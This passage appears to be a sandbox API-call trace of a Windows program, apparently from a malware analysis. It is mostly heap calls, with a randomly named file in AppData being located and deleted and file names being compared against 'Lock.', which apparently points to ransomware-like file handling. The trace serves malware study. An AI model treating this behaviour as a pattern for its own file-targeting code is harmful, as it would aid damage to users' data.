dwFlags=0x0, lpMem=0x3be0dd0 | out: hHeap=0x970000) returned 1 [0237.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0237.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0237.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0237.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0237.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0237.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0237.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0237.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0237.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0237.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0237.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f670 | out: hHeap=0x970000) returned 1 [0237.422] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0237.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0237.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0237.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0237.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0237.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0237.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0237.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0237.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0237.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0237.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e78 [0237.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f38 [0237.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f08 [0237.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0237.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f20 [0237.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f710 [0237.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0237.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d58 [0237.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0237.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0237.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0237.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0237.423] CloseHandle (hObject=0x2d0) returned 1 [0237.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0237.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0237.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04810 | out: hHeap=0x970000) returned 1 [0237.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0237.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0237.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0237.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0237.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0237.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0237.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0237.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0237.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0237.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0237.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f710 | out: hHeap=0x970000) returned 1 [0237.428] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0237.428] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0237.429] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0237.429] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0237.429] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0237.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0237.429] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0237.429] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0237.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0237.429] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0237.429] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0237.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0237.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0237.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0237.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0237.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0237.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0237.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0237.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ec94d0 | out: hHeap=0x970000) returned 1 [0237.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0237.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0237.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f558 | out: hHeap=0x970000) returned 1 [0237.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0237.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3f0 | out: hHeap=0x970000) returned 1 [0237.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0237.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0237.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0237.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f580 | out: hHeap=0x970000) returned 1 [0237.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0237.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0237.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0237.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f698 | out: hHeap=0x970000) returned 1 [0237.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0237.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5f8 | out: hHeap=0x970000) returned 1 [0237.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0237.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f760 | out: hHeap=0x970000) returned 1 [0237.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0237.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f788 | out: hHeap=0x970000) returned 1 [0237.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0237.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f490 | out: hHeap=0x970000) returned 1 [0237.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0237.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0237.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0237.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f800 | out: hHeap=0x970000) returned 1 [0237.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503e0 | out: hHeap=0x970000) returned 1 [0237.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0237.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f042d8 | out: hHeap=0x970000) returned 1 [0237.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0237.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5a8 | out: hHeap=0x970000) returned 1 [0237.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503c8 | out: hHeap=0x970000) returned 1 [0237.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50560 | out: hHeap=0x970000) returned 1 [0237.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0237.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0237.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0237.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0237.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f468 | out: hHeap=0x970000) returned 1 [0237.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0237.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5d0 | out: hHeap=0x970000) returned 1 [0237.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0237.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0237.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0237.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f648 | out: hHeap=0x970000) returned 1 [0237.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0237.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0237.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0237.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f620 | out: hHeap=0x970000) returned 1 [0237.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50548 | out: hHeap=0x970000) returned 1 [0237.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0237.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0237.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0237.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0237.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504e8 | out: hHeap=0x970000) returned 1 [0237.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0237.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0237.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50470 | out: hHeap=0x970000) returned 1 [0237.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0237.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e564e0 | out: hHeap=0x970000) returned 1 [0237.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0237.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50620 | out: hHeap=0x970000) returned 1 [0237.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50428 | out: hHeap=0x970000) returned 1 [0237.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0237.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506b0 | out: hHeap=0x970000) returned 1 [0237.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50668 | out: hHeap=0x970000) returned 1 [0237.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50500 | out: hHeap=0x970000) returned 1 [0237.477] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0237.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503e0 [0237.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50428 [0237.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0237.477] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0237.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0237.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0237.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0237.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0237.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0237.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505d8 [0237.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x2e58910 [0237.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0237.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505d8 | out: hHeap=0x970000) returned 1 [0237.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0237.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0237.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0237.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0237.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0237.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0237.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0237.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x58) returned 0x2e564e0 [0237.478] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/PXFkhPM.gif", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\PXFkhPM.gif", lpFilePart=0x8cedf4*="PXFkhPM.gif") returned 0x2b [0237.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e564e0 | out: hHeap=0x970000) returned 1 [0237.478] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\PXFkhPM.gif" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\pxfkhpm.gif")) returned 0x20 [0237.478] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\PXFkhPM.gif", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x97044220, ftCreationTime.dwHighDateTime=0x1d5eb99, ftLastAccessTime.dwLowDateTime=0x6b312db0, ftLastAccessTime.dwHighDateTime=0x1d5eb4a, ftLastWriteTime.dwLowDateTime=0x6b312db0, ftLastWriteTime.dwHighDateTime=0x1d5eb4a, nFileSizeHigh=0x0, nFileSizeLow=0x1245c, dwReserved0=0x1, dwReserved1=0x1c, cFileName="PXFkhPM.gif", cAlternateFileName="")) returned 0xa872d0 [0237.478] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\PXFkhPM.gif" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\pxfkhpm.gif")) returned 1 [0237.558] FindNextFileW (in: hFindFile=0xa872d0, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x97044220, ftCreationTime.dwHighDateTime=0x1d5eb99, ftLastAccessTime.dwLowDateTime=0x6b312db0, ftLastAccessTime.dwHighDateTime=0x1d5eb4a, ftLastWriteTime.dwLowDateTime=0x6b312db0, ftLastWriteTime.dwHighDateTime=0x1d5eb4a, nFileSizeHigh=0x0, nFileSizeLow=0x1245c, dwReserved0=0x1, dwReserved1=0x1c, cFileName="PXFkhPM.gif", cAlternateFileName="")) returned 0 [0237.558] FindClose (in: hFindFile=0xa872d0 | out: hFindFile=0xa872d0) returned 1 [0237.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0237.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0237.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0237.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50428 | out: hHeap=0x970000) returned 1 [0237.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503e0 | out: hHeap=0x970000) returned 1 [0237.559] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0237.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504e8 [0237.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0237.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0237.559] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0237.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50500 [0237.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0237.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0237.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0237.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0237.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50620 [0237.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x2e58910 [0237.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0237.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50620 | out: hHeap=0x970000) returned 1 [0237.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0237.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0237.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0237.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0237.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0237.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0237.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0237.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0237.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0237.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0237.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x58) returned 0x2e564e0 [0237.560] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/PXFkhPM.gif", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\PXFkhPM.gif", lpFilePart=0x8cf650*="PXFkhPM.gif") returned 0x2b [0237.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e564e0 | out: hHeap=0x970000) returned 1 [0237.560] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\PXFkhPM.gif" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\pxfkhpm.gif")) returned 0xffffffff [0237.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0237.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0237.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50500 | out: hHeap=0x970000) returned 1 [0237.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0237.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0237.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504e8 | out: hHeap=0x970000) returned 1 [0237.561] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0237.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0237.561] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0237.561] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0237.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0237.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0237.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50428 [0237.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505d8 [0237.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0237.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0237.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0237.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50620 [0237.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0237.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0237.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0237.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504e8 [0237.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0237.562] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="qFOBP8FwJiuKVs.avi", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0237.562] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FOBP8FwJiuKVs.avi", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0237.562] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OBP8FwJiuKVs.avi", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0237.562] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BP8FwJiuKVs.avi", 